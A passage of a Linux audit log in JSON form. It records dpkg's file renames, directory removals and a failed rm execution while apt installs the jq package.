"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/triggers",
"inode": 277174,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libjq1:amd64.triggers",
"inode": 277174,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:593",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x2e",
"0x736269",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/shlibs",
"inode": 277171,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:594",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556eba45b580",
"0x556eba45b580",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/shlibs",
"inode": 277171,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libjq1:amd64.shlibs",
"inode": 277171,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:595",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556ebb16c3c6",
"0x8",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/md5sums",
"inode": 277165,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:596",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556eba45b580",
"0x556eba45b580",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/md5sums",
"inode": 277165,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libjq1:amd64.md5sums",
"inode": 277165,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:597",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277176,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0005",
"inode": 277176,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:598",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/",
"inode": 2,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:599",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/",
"inode": 786435,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:600",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/",
"inode": 786440,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:601",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:602",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/",
"inode": 786435,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:603",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/",
"inode": 786447,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:604",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:605",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:606",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.917:607",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.921:608",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277182,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0006",
"inode": 277182,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.921:609",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-39",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.921:610",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7642,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae4660",
"0x7ffef7ae4720",
"0x556eba29b570",
"0x7ffef7ae4770"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/rm",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
